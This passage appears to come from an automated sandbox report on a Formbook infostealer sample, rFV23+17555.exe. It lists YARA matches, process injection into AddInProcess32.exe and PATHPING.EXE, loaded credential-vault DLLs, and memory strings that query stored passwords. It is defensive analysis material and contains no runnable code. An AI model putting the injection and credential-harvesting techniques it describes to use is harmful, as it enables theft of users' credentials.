Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BFFB80	7_2_02BFFB80
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9FB76	7_2_02C9FB76
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE38E0	7_2_02BE38E0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C4D800	7_2_02C4D800
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C75910	7_2_02C75910
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE9950	7_2_02BE9950
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BFB950	7_2_02BFB950
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE9EB0	7_2_02BE9EB0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE1F92	7_2_02BE1F92
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9FFB1	7_2_02C9FFB1
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9FF09	7_2_02C9FF09
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C9FCF2	7_2_02C9FCF2
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C59C32	7_2_02C59C32
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BFFDC0	7_2_02BFFDC0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C91D5A	7_2_02C91D5A
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02C97D73	7_2_02C97D73
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BE3D40	7_2_02BE3D40
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_004112C0	7_2_004112C0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_0040C4E8	7_2_0040C4E8
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_0040C4F0	7_2_0040C4F0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_0040C710	7_2_0040C710
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_0040A790	7_2_0040A790
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00412DDB	7_2_00412DDB
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00412DE0	7_2_00412DE0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_004013B2	7_2_004013B2
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00429CC0	7_2_00429CC0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: String function: 02C27E54 appears 102 times
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: String function: 02C5F290 appears 105 times
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: String function: 02BCB970 appears 280 times
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: String function: 02C4EA12 appears 86 times
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: String function: 02C15130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01ABB970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01B17E54 appears 102 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01B05130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01B4F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 01B3EA12 appears 86 times

Sample file is different than original file name gathered from version info

Source: rFV23+17555.exe, 00000000.00000002.2735199295.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rFV23+17555.exe
Source: rFV23+17555.exe, 00000000.00000002.2747919357.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll, vs rFV23+17555.exe
Source: rFV23+17555.exe, 00000000.00000000.2039373453.00000000001B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebinclittty.exeH vs rFV23+17555.exe
Source: rFV23+17555.exe, 00000000.00000002.2742755044.0000000003AD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs rFV23+17555.exe
Source: rFV23+17555.exe, 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs rFV23+17555.exe
Source: rFV23+17555.exe	Binary or memory string: OriginalFilenamebinclittty.exeH vs rFV23+17555.exe

Uses 32bit PE files

Source: rFV23+17555.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 4.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3293807088.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2952528062.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3295294820.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3295074777.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3294293351.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2955366160.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3295299661.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: rFV23+17555.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@3/2

Source: C:\Users\user\Desktop\rFV23+17555.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rFV23+17555.exe.log

Source: PATHPING.EXE, 00000007.00000003.3131725453.0000000002792000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.3131790851.000000000277E000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3294360405.000000000277E000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.3294360405.00000000027B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rFV23+17555.exe, 00000000.00000000.2039057570.00000000001A7000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: Select SERVERADDRESS, USERNAME, PASSWORD, SERVERPORT, DBFORDATA, DBFORFILE FROM serverlist WHERE DEFAULTCONNECTION =1;

Source: unknown	Process created: C:\Users\user\Desktop\rFV23+17555.exe "C:\Users\user\Desktop\rFV23+17555.exe"
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Process created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Process created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Yara match	File source: 0.2.rFV23+17555.exe.3aea230.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rFV23+17555.exe.5fa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rFV23+17555.exe.5fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rFV23+17555.exe.3aea230.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2742755044.0000000003AD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2735654036.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rFV23+17555.exe PID: 516, type: MEMORYSTR

Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0607A157 push eax; iretd	0_2_0607A181
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07749BA8 pushad ; ret	0_2_0774A103
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07748626 pushad ; ret	0_2_07748663
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_077400BE push esp; retf	0_2_077400C1
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_0774A0A5 pushad ; ret	0_2_0774A103
Source: C:\Users\user\Desktop\rFV23+17555.exe	Code function: 0_2_07748690 push ecx; ret	0_2_077486A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040E00E pushfd ; retf	4_2_0040E010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040D119 push ebx; iretd	4_2_0040D11A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0042C193 push es; retf E8E4h	4_2_0042C2B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00416223 pushad ; retf DE68h	4_2_0041627E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_004052AE push ebx; retf	4_2_004052B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040841A push ebp; iretd	4_2_00408421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040A55C push 0000002Eh; retf	4_2_0040A58E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0040A563 push 0000002Eh; retf	4_2_0040A58E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_004036A0 push eax; ret	4_2_004036A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_004016B7 push edx; ret	4_2_004016F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0041DEB8 push ds; iretd	4_2_0041DEC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_01AC09AD push ecx; mov dword ptr [esp], ecx	4_2_01AC09B6
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_02BD09AD push ecx; mov dword ptr [esp], ecx	7_2_02BD09B6
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_004203CA pushad ; ret	7_2_004203E0
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00420533 push es; iretd	7_2_00420539
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_0041A815 push ds; iretd	7_2_0041A81F
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_0040A96B pushfd ; retf	7_2_0040A96D
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00428AF0 push es; retf E8E4h	7_2_00428C10
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00412B80 pushad ; retf DE68h	7_2_00412BDB
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00404D77 push ebp; iretd	7_2_00404D7E
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00406EC0 push 0000002Eh; retf	7_2_00406EEB
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00406EB9 push 0000002Eh; retf	7_2_00406EEB
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00415130 push edx; retn CB1Fh	7_2_00415299
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_0040DB0D push ebp; iretd	7_2_0040DB16
Source: C:\Windows\SysWOW64\PATHPING.EXE	Code function: 7_2_00401C0B push ebx; retf	7_2_00401C0D

Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
